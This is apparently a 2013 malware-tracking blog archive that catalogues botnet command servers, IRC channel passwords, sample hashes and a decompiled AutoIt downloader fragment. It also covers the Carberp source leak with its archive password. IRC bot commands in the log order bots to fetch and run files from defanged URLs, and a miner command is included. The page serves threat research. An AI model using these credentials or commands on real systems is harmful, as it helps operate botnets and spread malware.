Month: June 2013

(Pony loader hosted by

Resolved to
Server:
Gate file: /p/stats.php
This is currently being downloaded by this citadel net. This is also a backup domain for a betabot, and is the domain currently used by it.
Betabot login: hxxp://
Related md5s (Search on for samples): 7ec71449228f4209b9df59bb68ec3a5f
Hosting infos:

(Irc botnet hosted by

Resolved to
Server:
Port: 1989
Server password: r00t33
Channel: #xxx
Channel password: r00t33
Topic for #xxx is: !open hxxp://www.fullhdizle.co
Topic for #xxx set by Coder at Wed Jun 26 14:02:37 2013
Related md5s (search on to download the samples): 8cbdc21108b468ecd95644f18b83324d
Hosting infos:

(Athena irc botnet hosted by

Server:
Port: 6667
Current local users 436, max 2038
Channel: #network
#network 411
Related md5s (search on to download the samples): 891905810486c6dee6d246f9845fb5cd
Hosting infos:

Carberp The Banking Trojan Source Now Available To Public

First Zeus, now the Carberp source has been leaked to the public.
Picture from dk forum
Source and passwd for the rar archive are available via twitter, thanks to ivanlef0u.
Another link for the source here (around 1.88GB)
Password for the archive: “Kj1#w2*LadiOQpw3oi029)K Oa(28)uspeh”

(Betabot http botnet hosted by

Resolved to
Server:
Gate file: /b/order.php
Everyone should congratulate snk, who has taken his first baby steps into the 21st century by using an http bot. Unfortunately for him, he chose to use the l33t Hackforums bot Betabot with a 1mb stub Autoit crypter, but I guess he can only manage to

’s botnet hosted in Luxembourg Steinsel Root Sa)

The bot is downloaded by this autoit sample: hxxp://
which looks like an http autoit downloader; login here: hxxp://
Another sample downloaded from the dava.exe is this: hxxp:// Betabot)
Here is dava.exe decompiled:
$at2 = "0"
$at5 = 0
$at1 = "0"
$at3 = "0"
$avm = "0"
$asb = "0"
$at4 = "0"
#NoTrayIcon
#Region
#AutoIt3Wrapper_UseUpx=n

(Irc botnet hosted by

Resolved to
Server:
Port: 80
Server password: passwd
Channel: #root
Channel password: redem
!NAZEL hxxp:// a392564eae140562e4b27d0ab078ba1e
!NAZEL hxxp:// a392564eae140562e4b27d0ab078ba1e
!s -n
A modified ircd is used, so you may have trouble connecting.
Alternate domains:
Bitcoin mining info: minerd.exe -a scrypt -s 20 --no-longpoll -q -o -u anonymous.1 -p -x